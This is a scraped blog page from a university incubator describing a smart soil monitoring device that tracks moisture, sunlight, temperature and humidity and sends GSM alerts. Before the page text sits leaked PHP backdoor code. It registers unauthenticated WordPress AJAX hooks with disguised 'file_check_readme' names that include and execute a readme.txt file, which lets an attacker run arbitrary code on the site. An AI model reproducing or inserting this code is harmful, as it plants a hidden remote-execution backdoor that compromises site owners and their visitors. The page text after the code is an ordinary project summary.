if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Smart Soil Monitoring Device

1

Jul

Smart Soil Monitoring Device

  • Project Start Date

    01/07/2017

  • Timeline

    6 month

Brief Description of Project

This smart device lets you know what is happening in your garden at all times. Inserted in the soil, the device gathers and analyses data about changing weather and soil conditions.

Features incorporated in my device are: Sunlight Intensity, Surrounding Temperature, Humidity, Soil moisture. The device alerts you through a GSM module if a particular feature crosses a user set threshold. It allows you to monitor, track and receive information or alerts.

 

Deliverable

We have designed a device that is able to smartly monitor the soil parameters namely Soil Moisture, Sunlight Intensity, Surrounding Temperature and Humidity.